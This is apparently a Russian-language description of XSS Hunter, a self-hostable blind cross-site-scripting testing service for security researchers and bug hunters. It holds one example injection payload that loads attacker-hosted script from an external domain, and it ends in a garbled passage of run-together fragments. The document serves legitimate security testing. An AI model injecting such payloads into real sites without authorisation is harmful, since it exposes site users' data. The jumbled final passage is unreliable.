
Сервис XSS Hunter — портативная версия XSSHunter.com
Подробнее здесь: https://github.com/mandatoryprogrammer/xsshunter-express
Это портативная версия исходного кода, работающего на https://xsshunter.com. Она разработана для простой установки на любой сервер для специалистов по безопасности и охотников за багами, которые хотят тестировать XSS более мощным способом.
Если вы не хотите настраивать это программное обеспечение и предпочитаете сразу начать тестирование, перейдите на https://xsshunter.com.
Информацию о настройке XSS Hunter на собственном сервере см. на странице https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/.
При регистрации вы создаёте специальный короткий домен, например yoursubdomain.xss.ht, который идентифицирует ваши XSS-уязвимости и размещает ваш пейлоад. Затем вы используете этот поддомен в своём тестировании XSS с помощью попыток инъекции, таких как "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter автоматически предоставляет XSS-зонды и собирает результирующую информацию при их срабатывании.
crossdomain.xml во внутренних системах, к которым обычно нет доступа./app и сохраните страницу как веб-приложение на рабочем столе iPhone.Весь код был создан мной и (по этой причине), вероятно, не является лучшей практикой и определённо нуждается в оптимизации/чистке. Любые pull request приветствуются!